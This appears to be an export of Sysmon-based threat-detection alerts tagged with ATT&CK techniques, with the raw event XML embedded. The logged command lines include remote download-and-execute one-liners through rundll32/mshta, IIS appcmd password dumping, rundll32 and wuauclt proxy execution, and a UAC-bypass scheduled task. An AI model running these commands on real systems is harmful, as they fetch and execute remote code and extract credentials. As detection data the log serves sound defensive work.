SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-09FE-5F86-0000-001051841401 + 1716 + 
C:\Windows\System32\wuauclt.exe + wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558452777.286254,2019-05-21T19:32:57.286254+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4125 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-4F8A-5CE3-0000-0010C5BB4800 + 3548 + C:\Windows\System32\cmd.exe + "cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1611667274.296774,2021-01-26T17:21:14.296774+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2429137 + + + + + 
Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-01-26 13:21:13.976 + 00247C92-1749-6010-0000-0010EFAAD92E + 23168 + C:\Windows\SysWOW64\cmd.exe + 10.0.18362.1316 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd + C:\Users\bouss\source\repos\blabla\blabla\ + LAPTOP-JU4M3I0E\bouss + 00247C92-5082-600D-0000-0020A246F726 + 0x26f746a2 + 5 + Medium + SHA1=DE550F262D31FF81730867A7E294795D085F503B,MD5=E567B7F80B21CC8905383BE1073F3707,SHA256=E5CC034E9062E1211FDDE5F85EBF2BD4E4EF63272BA23877C185C94FB503891E,IMPHASH=392B4D61B1D1DADC1F06444DF258188A + 00247C92-1749-6010-0000-0010348FD92E + 2988 + C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe + C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.124804,2019-05-27T05:29:20.124804+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5979 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.084 + 365ABB72-3D70-5CEB-0000-0010F2DEFF00 + 2772 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password + 
C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557621160.342246,2019-05-12T04:32:40.342246+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16248 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:35.289 + 365ABB72-69A3-5CD7-0000-00109D7F2200 + 1860 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-DC77-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-69A3-5CD7-0000-001064792200 + 3432 + C:\Windows\System32\taskeng.exe + taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435998.310206,2019-07-30T01:33:18.310206+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c mshta.exe 
javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4902 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:18.241 + 747F3D96-661E-5D3F-0000-0010A3148700 + 776 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969965.405337,2019-05-27T19:12:45.405337+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6173 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:44.023 + 365ABB72-FE6C-5CEB-0000-0010050C0C00 + 3520 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost 
Service where(name="VSS") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE6B-5CEB-0000-00102A090C00 + 1536 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16452 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:09.573 + 365ABB72-2B21-5CD8-0000-001039DD2500 + 816 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) 
running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16452 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:09.573 + 365ABB72-2B21-5CD8-0000-001039DD2500 + 816 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16452 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:09.573 + 365ABB72-2B21-5CD8-0000-001039DD2500 + 816 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + 
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.542 + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" 
"C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.542 + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\eventvwr.exe , Parent CommandLine ("C:\Windows\system32\eventvwr.exe") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 01:59:28.903 + 365ABB72-8980-5CD3-0000-0010134D1F00 + 3840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + 
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-8980-5CD3-0000-00105F451F00 + 3884 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.542 + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.034674,2019-05-27T05:29:20.034674+04:00,,Threat,Low,Found User (IIS 
APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5976 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.994 + 365ABB72-3D6F-5CEB-0000-001032DBFF00 + 1900 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1088] Bypass User Account Control - Process,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 01:59:28.903 + 365ABB72-8980-5CD3-0000-0010134D1F00 + 3840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + 
Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-8980-5CD3-0000-00105F451F00 + 3884 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 01:59:28.903 + 365ABB72-8980-5CD3-0000-0010134D1F00 + 3840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-8980-5CD3-0000-00105F451F00 + 3884 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c 
%%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6171 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:43.969 + 365ABB72-FE6B-5CEB-0000-00102A090C00 + 1536 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6171 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:43.969 + 365ABB72-FE6B-5CEB-0000-00102A090C00 + 1536 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service 
where(name="VSS") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1557621155.258262,2019-05-12T04:32:35.258262+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn elevator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16245 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:35.070 + 365ABB72-69A3-5CD7-0000-0010306F2200 + 3752 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /run /tn elevator + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-5DEC-5CD7-0000-00204A380100 + 0x1384a + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 